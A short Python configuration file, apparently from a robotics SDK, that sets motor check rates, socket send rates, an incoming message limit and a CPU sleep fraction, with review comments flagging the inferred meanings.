# NOTE(review): meanings inferred from the names -- confirm against the
# SDK modules that consume these values.
MOTORS_CHECK_PER_SECOND = 20
MOTORS_POINT_TO_POINT_CHECK_PER_SECOND = 10
WEB_SOCKET_SEND_PER_SECOND = 10
SOCKET_SEND_PER_SECOND = 20

# Presumably the maximum number of incoming socket messages handled per
# cycle -- verify in the socket handler.
SOCKET_INCOMING_LIMIT = 5

# Presumably the fraction of each loop period spent sleeping to avoid
# busy-waiting the CPU -- verify where it is used.
SLEEP_AVOID_CPU_WASTE = 0.80
| 0.902344 | 1 |